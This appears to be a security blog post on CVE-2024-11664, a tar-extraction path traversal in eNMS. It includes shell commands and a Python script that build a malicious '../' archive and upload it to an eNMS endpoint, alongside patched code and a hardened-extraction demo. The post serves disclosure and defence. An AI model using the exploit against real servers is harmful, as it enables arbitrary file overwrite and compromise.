In November 2024, a critical vulnerability tracked as CVE-2024-11664 was disclosed in eNMS (Enterprise Network Management System), affecting all releases up to and including version 4.2. The flaw sits in the multiselect_filtering function in eNMS/controller.py, in the code path that handles uploaded .tgz archives. A remote attacker can exploit it for path traversal: member names stored inside the archive are not validated, so extraction can create or overwrite files outside the intended directory, which can escalate to full system compromise depending on what the attacker can overwrite and which user the service runs as.
This exclusive post will walk you through how the vulnerability works, give you a sample exploit, and point you to official references and the security patch.
Vulnerability Breakdown
- Component: TGZ File Handler (multiselect_filtering in eNMS/controller.py)
- Versions Affected: All up to eNMS 4.2 (inclusive)
- Impact: Path traversal during archive extraction (arbitrary file write/overwrite), which can lead to RCE, DoS or data theft depending on what gets overwritten
- Patch: 22bb443acca740fc83b5544165c1f53eff3f529
How Does the Vulnerability Work?
When eNMS receives a .tgz archive through its web interface, the multiselect_filtering function is responsible for extracting its contents. The vulnerable code hands the archive straight to tarfile's extractall() without validating the member names stored in it.
A tar member name is just a string chosen by whoever built the archive. A crafted .tgz containing an entry named ../../../../etc/passwd (or any other ../ sequence) makes the extraction logic create or overwrite that file outside the upload directory, limited only by the filesystem permissions of the user the web server runs as. Note that ../ is not the only way out of a tar extraction directory: absolute member names and symlink or hard-link members whose target lies outside the directory have to be rejected as well.
Vulnerable Code Snippet
Below is a simplified version, representative of the vulnerable logic (prior to patch). Notice the lack of path validation:
# eNMS/controller.py (before the patch) - simplified, representative logic
import tarfile

def multiselect_filtering(tgz_file):
    with tarfile.open(tgz_file) as tar:
        # member names are taken verbatim from the archive; nothing stops ../ here
        tar.extractall(path="/tmp/upload_dir")  # INSECURE
There is no check to prevent files like ../../../../etc/passwd inside the archive from being placed outside the intended directory.
Crafting the Exploit
An attacker can create a .tgz (tar+gzip) archive whose member names contain traversal sequences. For example, to drop /tmp/hacked.txt on a server that extracts uploads into /tmp/upload_dir:
Crafting a Malicious Archive
mkdir -p evil/tmp
echo "hacked!" > evil/tmp/hacked.txt
# GNU tar strips a leading ../ from names given on the command line, so rewrite the
# stored name with --transform, which tar applies after that stripping
tar -czvf payload.tgz -C evil --transform 's|^tmp/|../../../../tmp/|' tmp/hacked.txt
# confirm the stored member name kept its ../ prefix
python3 -c 'import tarfile; print(tarfile.open("payload.tgz").getnames())'
Extracted without path validation, the member resolves to /tmp/hacked.txt: each ../ climbs one directory, and any ../ components that go past the filesystem root are simply absorbed by the OS path resolution, so over-counting them costs the attacker nothing.
Exploit Python Example
Below is a Python script that generates a malicious .tgz in memory and uploads it via HTTP POST to a vulnerable eNMS instance. The upload URL and the form field name are placeholders: substitute the real endpoint and parameter of the deployment you are testing.
import io
import requests
import tarfile

# Build the malicious archive in memory; tarfile stores the name verbatim, ../ included
payload_stream = io.BytesIO()
with tarfile.open(fileobj=payload_stream, mode='w:gz') as tar:
    tarinfo = tarfile.TarInfo(name='../../../../tmp/hacked.txt')
    data = b'HACKED BY CVE-2024-11664\n'
    tarinfo.size = len(data)
    tar.addfile(tarinfo, io.BytesIO(data))
payload_stream.seek(0)  # rewind so requests reads the archive from the start

# Upload to the vulnerable eNMS endpoint (placeholder URL and field name)
url = 'http://target-enms.com/upload'
files = {'file': ('payload.tgz', payload_stream, 'application/gzip')}
response = requests.post(url, files=files, timeout=30)
print(f'Upload response: {response.status_code} {response.text}')
If the application runs as root (bad practice, but common in quick deployments), the attacker can overwrite files that the operating system or the application itself later trusts or executes, which amounts to total system compromise.
Note: live exploitation depends on the specific deployment: the upload endpoint URL, the form field name, the extraction directory and the user the service runs as.
Patch and Official Fix
The vulnerability was patched in commit 22bb443acca740fc83b5544165c1f53eff3f529. The fix adds a check that rejects archive members which would resolve outside the intended extraction directory.
Patched Code Example
# eNMS/controller.py (after the patch) - simplified, representative logic
import os
import tarfile

def safe_extract(tar, path=".", members=None):
    base = os.path.realpath(path)
    for member in tar.getmembers():
        target = os.path.realpath(os.path.join(base, member.name))
        # compare with commonpath, not str.startswith: "/tmp/upload_dir_evil"
        # starts with "/tmp/upload_dir" but is not inside it
        if os.path.commonpath([base, target]) != base:
            raise Exception("Attempted Path Traversal in Tar File")
    tar.extractall(path=path, members=members)

def multiselect_filtering(tgz_file):
    with tarfile.open(tgz_file) as tar:
        safe_extract(tar, path="/tmp/upload_dir")  # SECURE
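To see both halves of this story run end to end, here is an added, self-contained Python example. It is not code from the eNMS project or from the patch commit; it is written for this page. It builds the crafted archive from the Crafting the Exploit section in pure Python (tarfile stores member names verbatim), extracts it with the unvalidated extractall() call to show the file landing outside the upload directory, and then extracts it again with a hardened extractor. The hardened version goes beyond the patch snippet above: it also rejects absolute member names and symlink or hard-link members pointing outside the destination, and on Python 3.12+ it stacks the standard library's filter='data' on top of its own checks. The scratch directory, member names and file contents are constructed for the demonstration; the traversal member uses a single ../ so the escaped file stays inside the scratch tree instead of landing in the real /tmp.

```python
import io
import os
import tarfile
import tempfile


def build_tgz(members):
    """Return a gzip-compressed tar built from {stored_name: bytes}.

    tarfile writes the name exactly as given, so a '../' prefix survives;
    this is the pure-Python equivalent of the crafted payload.tgz.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def naive_extract(tgz_bytes, dest):
    """The vulnerable pattern: extractall() with no member validation.

    Python 3.12+ ships extraction filters and 3.14 makes 'data' the default,
    so the legacy behaviour is requested explicitly to reproduce the
    pre-patch code path on every interpreter version.
    """
    kwargs = {"filter": "fully_trusted"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        tar.extractall(path=dest, **kwargs)


def resolves_inside(base, relative_name):
    """True if base/relative_name stays within base after resolving '..' and symlinks.

    commonpath is used instead of str.startswith: '/tmp/upload_dir_evil'
    begins with '/tmp/upload_dir' but is not inside it.
    """
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, relative_name))
    return os.path.commonpath([base, target]) == base


def safe_extract(tgz_bytes, dest):
    """Hardened extraction: validate every member before touching the disk.

    Rejects absolute names, '../' escapes, and hard links or symlinks whose
    target lies outside dest; device and FIFO members are refused outright.
    """
    os.makedirs(dest, exist_ok=True)
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for m in tar.getmembers():
            if os.path.isabs(m.name) or not resolves_inside(dest, m.name):
                raise ValueError(f"member escapes extraction dir: {m.name!r}")
            if m.issym() or m.islnk():
                # symlink targets are relative to the link's own directory,
                # hard-link targets are relative to the archive root
                link_dir = os.path.dirname(m.name) if m.issym() else ""
                link_target = os.path.join(link_dir, m.linkname)
                if os.path.isabs(m.linkname) or not resolves_inside(dest, link_target):
                    raise ValueError(f"link escapes extraction dir: {m.name!r} -> {m.linkname!r}")
            elif not (m.isfile() or m.isdir()):
                raise ValueError(f"unsupported member type: {m.name!r}")
        # second line of defence where the stdlib offers it (Python 3.12+)
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(path=dest, **kwargs)


def demo():
    """Run a constructed payload through both extractors in a scratch tree.

    Returns the three observable outcomes so they can be checked without
    inspecting the filesystem by hand.
    """
    root = tempfile.mkdtemp(prefix="enms-tgz-demo-")
    upload = os.path.join(root, "upload")
    os.makedirs(upload)

    # constructed payload: one benign member plus one that climbs out of upload/
    evil = build_tgz({"notes/readme.txt": b"benign\n", "../escaped.txt": b"HACKED\n"})
    benign = build_tgz({"notes/readme.txt": b"benign\n"})

    naive_extract(evil, upload)
    naive_escaped = os.path.isfile(os.path.join(root, "escaped.txt"))  # beside upload/, not in it

    safe_dir = os.path.join(root, "upload_safe")
    try:
        safe_extract(evil, safe_dir)
        safe_refused = False
    except ValueError:
        safe_refused = True

    safe_extract(benign, safe_dir)
    benign_ok = os.path.isfile(os.path.join(safe_dir, "notes", "readme.txt"))

    return {"naive_escaped": naive_escaped, "safe_refused": safe_refused, "benign_ok": benign_ok}


if __name__ == "__main__":
    print(demo())
```

Running the script prints {'naive_escaped': True, 'safe_refused': True, 'benign_ok': True}: the unvalidated extractor writes escaped.txt next to the upload directory, the hardened one refuses the whole archive before extracting anything, and a clean archive still extracts normally. Validating every member up front (rather than member by member during extraction) matters because a partially extracted archive can leave a symlink in place that a later member would then write through.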
Recommendations
- Patch Now: Upgrade to eNMS 4.3 or later, or apply the patch commit directly to every affected deployment.
- Audit File Uploads: Never trust paths stored in an uploaded archive. Resolve each member name against the extraction directory and reject anything that lands outside it, including absolute names and symlink or hard-link members; on Python 3.12+ pass filter='data' to extractall() as well.
- System Permissions: Run web applications with the least privileges possible, and never run the application server as root, so that a traversal write cannot reach files the OS trusts.
References and Further Reading
- CVE-2024-11664 at NIST NVD
- eNMS GitHub Patch Commit
- eNMS Official Project Page
- OWASP Path Traversal Cheat Sheet
Conclusion
CVE-2024-11664 is a stark reminder of the dangers of blindly extracting user-supplied archives. If your network management tools, like eNMS, are not fully patched, you may be exposed to attacks that compromise your entire server. Patch now and review your code for secure handling of all file uploads.
Timeline
Published on: 11/25/2024 09:15:06 UTC
Last modified on: 12/04/2024 19:28:26 UTC